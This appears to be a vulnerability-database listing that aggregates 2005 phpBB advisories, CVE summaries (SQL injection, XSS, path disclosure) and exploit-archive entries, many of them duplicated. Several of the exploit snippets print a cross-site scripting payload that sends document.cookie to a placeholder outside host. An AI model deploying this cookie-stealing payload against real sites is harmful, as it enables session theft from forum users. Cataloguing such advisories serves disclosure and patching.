CVE-2005-3536

CVE-2005-3536 : SQL injection in phpBB 2 prior to 2.0.18 via the topic type. Multiple connected advisories (Debian DSA-925-1, OpenVAS entries) confirm the vulnerability and suggest patching phpBB2 packages; remediation involves upgrading to the fixed phpBB version per the advisories. The affected...

[SECURITY] [DSA 925-1] New phpbb2 packages fix several vulnerabilities

-------------------------------------------------------------------------- Debian Security Advisory DSA 925-1 [email protected] http://www.debian.org/security/ Martin Schulze December 22nd, 2005 http://www.debian.org/security/faq -...

[SECURITY] [DSA 925-1] New phpbb2 packages fix several vulnerabilities

-------------------------------------------------------------------------- Debian Security Advisory DSA 925-1 [email protected] http://www.debian.org/security/ Martin Schulze December 22nd, 2005 http://www.debian.org/security/faq -...

DSA-925-1 phpbb2 - several

Bulletin has no description...

phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit

Exploit for unknown platform in category web applications ==================================================== phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0;...

phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure

/ phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0; X="' c.php: milw0rm.com 2005-12-21...

phpBB &lt;= 2.0.18 Remote XSS Cookie Disclosure Exploit

No description provided by source. / phpBB = 2.0.18 XSS Cookie Disclosure Proof of Concept -- 'the html is on exploit' original exploit by: cXIb8O3 - 12/16/2005 proof of concept by: jet -- http://jet.carbon-4.net/ develop a pure, lucid mind, not depending upon sound, flavor, touch, odor, or any...

phpBB 2.0.18 - Cross-Site Scripting Cookie Disclosure

phpBB 2.0.18 - Cross-Site Scripting Cookie Disclosure / phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0; X="' c.php: milw0rm.com 2005-12-21...

CVE-2005-4357

Cross-site scripting XSS vulnerability in phpBB 2.0.18, when "Allowed HTML tags" is enabled, allows remote attackers to inject arbitrary Javascript via a permitted HTML tag with " quote characters and active attributes such as onmouseover...

CVE-2005-4357

Cross-site scripting XSS vulnerability in phpBB 2.0.18, when "Allowed HTML tags" is enabled, allows remote attackers to inject arbitrary Javascript via a permitted HTML tag with " quote characters and active attributes such as onmouseover...

CVE-2005-4358

admin/admindisallow.php in phpBB 2.0.18 allows remote attackers to obtain the installation path via a direct request with a non-empty setmodules parameter, which causes an invalid appendsid function call that leaks the path in an error message...

CVE-2005-4358

admin/admindisallow.php in phpBB 2.0.18 allows remote attackers to obtain the installation path via a direct request with a non-empty setmodules parameter, which causes an invalid appendsid function call that leaks the path in an error message...

CVE-2005-4358

admin/admindisallow.php in phpBB 2.0.18 allows remote attackers to obtain the installation path via a direct request with a non-empty setmodules parameter, which causes an invalid appendsid function call that leaks the path in an error message...

CVE-2005-4357

Cross-site scripting XSS vulnerability in phpBB 2.0.18, when "Allowed HTML tags" is enabled, allows remote attackers to inject arbitrary Javascript via a permitted HTML tag with " quote characters and active attributes such as onmouseover...

CVE-2005-4358

CVE-2005-4358 affects phpBB 2.0.18. The vulnerability is in admin/admin_disallow.php where a direct request with a non-empty setmodules parameter leads to an invalid append_sid function call that leaks the installation path in an error message. Impact: remote attackers can obtain the path to the ...

CVE-2005-4357

CVE-2005-4357 is a cross-site scripting (XSS) vulnerability in phpBB when the “Allowed HTML tags” feature is enabled. The issue allows remote attackers to inject arbitrary JavaScript via a permitted HTML tag that includes characters like " and active attributes such as onmouseover, effectively ex...

CVE-2005-4346

Invalid SQL syntax error in blog.php in phpBB Blog 2.2.2 and earlier allows remote attackers to obtain the full path of the application via an invalid permalink parameter to index.php, which produces an invalid SQL query that leaks the full pathname in a SQL syntax error message. NOTE: this was...

CVE-2005-4346

Invalid SQL syntax error in blog.php in phpBB Blog 2.2.2 and earlier allows remote attackers to obtain the full path of the application via an invalid permalink parameter to index.php, which produces an invalid SQL query that leaks the full pathname in a SQL syntax error message. NOTE: this was...

CVE-2005-4346

phpBB Blog 2.2.2 and earlier: A function in blog.php causes an invalid SQL query when the permalink parameter to index.php is cleansed to empty (non-digit chars stripped), leading to a SQL syntax error that leaks the full application pathname. This is not a true SQL injection in practice, but the...

[Full-disclosure] phpBB 2.0.18 XSS and Full Path Disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22 Author: Maksymilian Arciemowicz cXIb8O3 Date: 16.12.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin...